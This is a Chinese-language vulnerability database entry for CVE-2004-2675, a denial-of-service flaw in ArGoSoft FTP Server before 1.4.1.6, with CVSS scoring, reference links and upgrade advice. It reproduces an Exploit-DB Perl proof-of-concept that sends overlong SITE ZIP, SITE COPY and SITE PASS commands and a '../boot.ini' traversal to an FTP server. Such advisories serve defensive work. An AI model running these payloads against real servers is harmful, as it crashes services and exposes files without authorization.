CVE-2004-2675
CVSS6.8
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:44:48
NMCOE    

[原文]ArGoSoft FTP Server before 1.4.1.6 allows remote authenticated users to cause a denial of service (crash) via a SITE PASS command with a long password parameter, which causes the database to be corrupted.


[CNNVD]ArGoSoft FTP服务器多个漏洞(CNNVD-200412-336)

        ArGoSoft FTP Server 1.4.1.6之前版本存在漏洞。远程攻击者可以借助带有超长密码参数的SITE PASS命令导致服务拒绝(崩溃),该漏洞导致数据库崩溃。

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: SINGLE_INSTANCE [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2675
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2675
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-336
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/9770
(PATCH)  BID  9770
http://secunia.com/advisories/11002
(PATCH)  SECUNIA  11002
http://xforce.iss.net/xforce/xfdb/15412
(UNKNOWN)  XF  argosoftftp-site-pass-dos(15412)
http://www.securiteam.com/windowsntfocus/5RP010KCAO.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/5RP010KCAO.html
http://www.osvdb.org/11332
(UNKNOWN)  OSVDB  11332
http://www.argosoft.com/rootpages/FtpServer/ChangeList.aspx
(UNKNOWN)  CONFIRM  http://www.argosoft.com/rootpages/FtpServer/ChangeList.aspx

- 漏洞信息

ArGoSoft FTP服务器多个漏洞
中危 未知
2004-12-31 00:00:00 2007-01-09 00:00:00
远程  
        ArGoSoft FTP Server 1.4.1.6之前版本存在漏洞。远程攻击者可以借助带有超长密码参数的SITE PASS命令导致服务拒绝(崩溃),该漏洞导致数据库崩溃。

- 公告与补丁

        These issues have been addressed in version 1.4.1.6 of ArGoSoft FTP Server.
        ArGoSoft FTP Server 1.0
        
        ArGoSoft FTP Server 1.2.2 .2
        
        ArGoSoft FTP Server 1.4.1 .4
        
        ArGoSoft FTP Server 1.4.1 .2
        
        ArGoSoft FTP Server 1.4.1 .3
        
        ArGoSoft FTP Server 1.4.1 .5
        
        ArGoSoft FTP Server 1.4.1 .1
        

- 漏洞信息 (23769)

ArGoSoft FTP Server 1.0/1.2/1.4 Multiple Vulnerabilities (EDBID:23769)
windows dos
2004-02-27 Verified
0 Beyond Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/9770/info

ArGoSoft has released version 1.4.1.6 of their FTP Server to address multiple unspecified security vulnerabilities. These issues include three buffer overruns when handling overly long FTP SITE ZIP and SITE COPY commands, a file enumeration issue involving the SITE UNZIP command and user database corruption denial of service attacks via the SITE PASS command. 

#!/usr/bin/perl
# Multiple Vulnerabilities in ArGoSoft FTP Server version 1.4 (1.4.1.4)
# Created by Beyond Security Ltd. - All rights reserved.

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2119",,
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}


$remote->autoflush(1);

my $ftp = "USER username\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "password", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

#$ftp = join ("", "SITE ZIP ", "A"x512, "\r\n");
#$ftp = join ("", "SITE ZIP storm.zip /f:", "A"x2048, "\r\n");
#$ftp = join ("", "SITE COPY ", "A"x2048, " ", "A"x10, "\r\n");
#$ftp = join ("", "SITE UNZIP ", "../boot.ini\r\n"); # Directory Traversal (we know a certain file exists)
#$ftp = join ("", "SITE PASS ", "storm ", "A"x3500, "\r\n"); # DoS ... against the user database

#Choose one of the above to test the vulnerabilities mentioned

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;
		

- 漏洞信息

11332
ArGoSoft FTP Server SITE PASS Long Argument DoS
Denial of Service
Loss of Availability
Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-02-27 Unknow
2004-02-27 Unknow

- 解决方案

Upgrade to version 1.4.1.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站